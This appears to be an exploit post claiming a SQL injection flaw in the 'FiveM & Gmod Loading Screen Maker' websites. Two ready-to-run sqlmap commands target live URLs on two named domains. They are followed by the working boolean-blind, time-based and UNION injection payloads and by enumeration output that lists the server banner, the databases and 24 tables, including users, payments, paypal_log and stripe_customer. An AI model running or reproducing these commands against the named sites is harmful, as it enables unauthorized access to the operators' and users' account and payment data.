# Exploit Title: FiveM & Gmod Loading Screen Maker Free | SQL Injection Vulnerability
# Author: Чингис хаан
# Tested On: Kali Linux
# sqlmap -u "https://www.fivem-lsm.com/help/category/index.php?id=1&s=7" --dbs --banner --batch
# sqlmap -u "https://www.gmod-lsm.com/help/category/index.php?id=1&s=7" --dbs --banner --batch
---------------------------------------------------------------------------------------------------
.com commercial
FiveM Loading Screen Maker Free
Gmod Loading Screen Maker Free
https://www.fivem-lsm.com/help/category/index.php?id=1&s=7
https://www.gmod-lsm.com/help/category/index.php?id=1&s=7
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 5974=5974
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 3621 FROM (SELECT(SLEEP(5)))sZGN)
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: id=1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162766271,0x6f694177744f414c556e7678635144664177676c5964686b52686b42534165786745614b48435744,0x7178786a71),NULL,NULL-- -
---
the back-end DBMS is MySQL
web application technology: PHP 7.4.26, PHP, Nginx
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
banner: '10.1.48-MariaDB-0ubuntu0.18.04.1'
available databases [2]:
[+] fivem_db
[+] gmod_db
[+] information_schema
Database: fivem_db
gmod_db
[24 tables]
+----------------------+
| authcode |
| blog |
| designs |
| fonts |
| knowledge_articles |
| knowledge_categories |
| languages |
| loadingscreens |
| login_code |
| music |
| own_music |
| payments |
| paypal_log |
| settings |
| staff_cache |
| statistics |
| stripe_customer |
| submit_languages |
| subscriptions |
| tags |
| user_payments |
| user_subscriptions |
| users |
| views |
+----------------------+